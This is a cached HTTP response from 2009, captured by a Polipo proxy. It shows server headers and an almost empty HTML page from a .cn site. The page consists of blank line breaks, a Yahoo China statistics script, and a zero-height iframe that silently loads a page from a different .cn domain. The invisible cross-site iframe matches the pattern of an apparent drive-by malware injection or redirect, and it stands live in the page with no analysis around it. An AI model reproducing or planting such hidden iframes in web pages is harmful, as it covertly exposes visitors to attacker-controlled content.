HTTP/1.1 200 OK
Content-Length: 244
ETag: "0fa25963297c91:60b"
Date: Wed, 25 Feb 2009 10:19:52 GMT
Last-Modified: Wed, 25 Feb 2009 10:19:48 GMT
Content-Type: text/html
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Polipo-Location: http://www.2009pppp.cn/llsg/33.htm
X-Polipo-Date: Wed, 25 Feb 2009 10:30:39 GMT
X-Polipo-Access: Thu, 05 Mar 2009 07:12:01 GMT

 <br>
<br>
<br>
<iframe src=http://www.sll2468.cn/a168/fxx.htm width=100 height=0></Iframe>
<br>
<br>
<br>
<br>
<br>
<br>
<br>


<script type="text/javascript" src="http://js.tongji.cn.yahoo.com/860886/ystat.js"></script>
<br>

